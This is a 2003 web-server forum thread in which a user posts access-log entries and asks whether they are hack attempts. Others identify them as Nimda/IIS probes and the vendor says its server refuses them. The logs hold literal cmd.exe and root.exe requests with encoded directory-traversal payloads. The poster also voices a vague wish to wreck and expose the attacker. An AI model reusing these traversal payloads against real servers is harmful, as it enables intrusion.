i dont believe this

TrickyRic · - Joined: 02 May 2003 Posts: 10 Location: UK

hi, about 2 month back i came here for help as i thought i was being hacked by someone using a spoofed ip address. anyway, in the end i decided to leave the server down for a while in the hopes the little *** would assume he was somehow blocked, i then gave up on that site and now have a new site to host, its been up less than a week and i already found what look like hack attempts in the log file. however, im now wondering if it is hack attempts or simply a dos or command line based web browser. the ip is again spoofed, though after a tracert was made, i think i have the actual ip, im now beginning to get so ****ed off that if this is another hack attempt, i may decide to do a bit myself and render his/her hdd useless and then do the same to everyone else who decides to hack my system, i dont encorage hacking but if thats what it takes to protect myself, im willing to do it.
anyway, my quetion really is can somebody please examine this section of log and tell me what exactly is happening? im not going to hide the ip as its spoofed anyway and if this is a hack attempt, im not going to waste time hiding his/her identity anyway, infact ill probably rip everything i can about the little *** and make it public. anyway ill shut up now cos i could keep typing forever, heres the log, thanks.

62.194.12.205 - - [03/Jul/2003:04:08:26 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 266
62.194.12.205 - - [03/Jul/2003:04:08:26 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 266
62.194.12.205 - - [03/Jul/2003:04:08:26 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
62.194.12.205 - - [03/Jul/2003:04:08:27 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
62.194.12.205 - - [03/Jul/2003:04:08:28 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
62.194.12.205 - - [03/Jul/2003:04:08:29 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
62.211.167.53 - - [03/Jul/2003:07:27:14 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 266
62.211.167.53 - - [03/Jul/2003:07:27:16 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 266
62.211.167.53 - - [03/Jul/2003:07:27:18 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
62.211.167.53 - - [03/Jul/2003:07:27:21 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
62.211.167.53 - - [03/Jul/2003:07:27:26 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
62.211.167.53 - - [03/Jul/2003:07:27:34 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
62.211.167.53 - - [03/Jul/2003:07:27:39 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
62.211.167.53 - - [03/Jul/2003:07:27:41 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
62.211.167.53 - - [03/Jul/2003:07:27:47 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
62.211.167.53 - - [03/Jul/2003:07:27:52 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
62.211.167.53 - - [03/Jul/2003:07:27:55 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
62.211.167.53 - - [03/Jul/2003:07:27:57 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
62.211.167.53 - - [03/Jul/2003:07:28:18 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
62.211.167.53 - - [03/Jul/2003:07:28:23 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268

....o, and i dont know if thats the end of whatever they were doing, i closed the port again at this point.

wiccaan · - Joined: 04 Jul 2003 Posts: 19

Well my log looks simular but I know mine arnt from hacking. Anyways if you noticed the log says GET which means someone has asked for a file from your site. This isnt indecating that you were hacking. Its just saying that someone has requested a file from you server to get. Here is a small section of my log: and yes I deleted the ip's for safty reasons
- - [28/Jun/2003:03:28:16 +1133] "GET / HTTP/1.1" 304 0
- - [28/Jun/2003:03:28:16 +1133] "GET /gc.bmp HTTP/1.1" 304 0
- - [29/Jun/2003:17:16:47 +1133] "GET / HTTP/1.1" 304 0
- - [29/Jun/2003:17:16:48 +1133] "GET /gc.bmp HTTP/1.1" 200 16384
- - [29/Jun/2003:17:16:49 +1133] "GET /main.html HTTP/1.1" 304 0
- - [29/Jun/2003:17:17:28 +1133] "GET / HTTP/1.1" 200 1495
- - [29/Jun/2003:17:17:28 +1133] "GET /gc.bmp HTTP/1.1" 200 569344
- - [29/Jun/2003:17:17:31 +1133] "GET /main.html HTTP/1.1" 200 3893
- - [29/Jun/2003:17:17:31 +1133] "GET /banner.bmp HTTP/1.1" 200 590366
- - [29/Jun/2003:17:16:49 +1133] "GET /banner.bmp HTTP/1.1" 200 262144
- - [29/Jun/2003:17:17:39 +1133] "GET /downloads.html HTTP/1.1" 200 2999
- - [29/Jun/2003:17:17:39 +1133] "GET /enter.gif HTTP/1.1" 200 2317
- - [29/Jun/2003:17:17:39 +1133] "GET /leave.gif HTTP/1.1" 200 2276
- - [29/Jun/2003:17:17:39 +1133] "GET /banner.bmp HTTP/1.1" 200 40960
- - [29/Jun/2003:17:17:39 +1133] "GET /downloads2.html HTTP/1.1" 200 6285
- - [29/Jun/2003:17:17:45 +1133] "GET /button.gif HTTP/1.1" 200 1584
- - [29/Jun/2003:17:17:54 +1133] "GET /banner.bmp HTTP/1.1" 200 221184
- - [29/Jun/2003:17:20:04 +1133] "GET /gc.bmp HTTP/1.1" 200 315392
- - [29/Jun/2003:17:20:09 +1133] "GET /downloads.html HTTP/1.1" 200 2999
- - [29/Jun/2003:17:20:09 +1133] "GET /enter.gif HTTP/1.1" 200 2317
- - [29/Jun/2003:17:20:09 +1133] "GET /leave.gif HTTP/1.1" 200 2276
- - [29/Jun/2003:17:20:09 +1133] "GET /downloads2.html HTTP/1.1" 200 6285
- - [29/Jun/2003:17:20:09 +1133] "GET /button.gif HTTP/1.1" 200 1584

os17fan · - Joined: 21 Mar 2003 Posts: 531 Location: USA

I know exactly what this is , this is either the "HTTP_IIS_ISAPI_Extension" attack or the "Nimda_Propagation" attack , your best bet is to buy Nortan Internet Security , its about $68 and that blocks any IP address trying to do those types of attacks , you have nothing to worry about since Abyss web server is not a IIS Web Server , but i don't know about the nimda one , get Nortan Internet Security 2003 , 8)
_________________
This web server is the best !

TrickyRic · - Joined: 02 May 2003 Posts: 10 Location: UK

thanks for the posts, im interested in the nortan internet security program, ive probably got a copy floating round here somewhere but before i install, can i just check.. my servers also running ftp and an irc channel, this security program isnt likely to interfier with them is it?
thanks

ill look into the attacks you mentionned and see what exactly there trying to do :)

thanks again

TrickyRic · - Joined: 02 May 2003 Posts: 10 Location: UK

i found nortan internet security 2002 and installed, the installer said something about not being abl to open the exe used to install the program so i had to open it manually, it installed fine after that and i restarted the server, but now, when i try to open any of the installed exe files i just get a blank (white) window with nothing on it, and the parental control exe just shows a c++ error and doesnt open, my servers running win98 and the cd says it runs on 98, the only program i have that could be conflicting is winpatrol which monitors changes to the system (like new programs) and asks if i wish to let the program run, however i told winpatrol to allow nortan to do anything it wishes to and it didnt show any errors.

any ideas? thanks

aprelium · - Joined: 22 Mar 2002 Posts: 6800

Please read http://www.aprelium.com/forum/viewtopic.php?t=807 .
_________________
Support Team
Aprelium - http://www.aprelium.com

TrickyRic · - Joined: 02 May 2003 Posts: 10 Location: UK

thanks, that link just made my day lol, guess i can now sit back and laugh at people attempting to use this method to hack me :D

3 cheers to abyss for automatically refusing this request :D